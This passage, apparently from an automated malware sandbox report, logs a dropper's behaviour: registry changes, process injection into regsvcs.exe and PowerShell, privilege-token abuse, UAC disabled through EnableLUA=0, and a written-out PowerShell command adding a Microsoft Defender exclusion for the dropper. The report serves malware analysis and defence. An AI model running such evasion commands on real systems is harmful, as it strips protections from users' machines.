Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
N/A N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
N/A N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2208 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2208 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2324 wrote to memory of 400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe
PID 2324 wrote to memory of 400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe
PID 2324 wrote to memory of 400 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe
PID 2324 wrote to memory of 4540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe
PID 2324 wrote to memory of 4540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe
PID 2324 wrote to memory of 4540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe
PID 2324 wrote to memory of 4804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe
PID 2324 wrote to memory of 4804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe
PID 2324 wrote to memory of 4804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe
PID 2324 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe
PID 2324 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe
PID 2324 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe
PID 2324 wrote to memory of 4132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe
PID 2324 wrote to memory of 4132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe
PID 2324 wrote to memory of 4132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe
PID 400 wrote to memory of 4384 N/A C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe
PID 400 wrote to memory of 4384 N/A C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe
PID 400 wrote to memory of 4384 N/A C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe
PID 4340 wrote to memory of 548 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 548 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 548 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 372 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 372 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 372 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 936 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 936 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 936 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 3264 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 3264 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 3264 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 3876 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 3876 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 3876 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1596 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1596 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1596 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 4128 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 4128 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 4128 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3672 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3672 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3672 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 5236 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\system32\cmd.exe
PID 3856 wrote to memory of 5236 N/A C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe C:\Windows\system32\cmd.exe
PID 3764 wrote to memory of 5252 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\system32\cmd.exe
PID 3764 wrote to memory of 5252 N/A C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe C:\Windows\system32\cmd.exe
PID 5236 wrote to memory of 5324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5236 wrote to memory of 5324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5252 wrote to memory of 5332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5252 wrote to memory of 5332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3636 wrote to memory of 5368 N/A C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe C:\Windows\system32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe

"C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe"

C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe

"C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe"

C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe

"C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe"

C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe

"C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe"

C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe

"C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe"

C:\Users\Admin\AppData\Local\Temp\ub4.0.exe

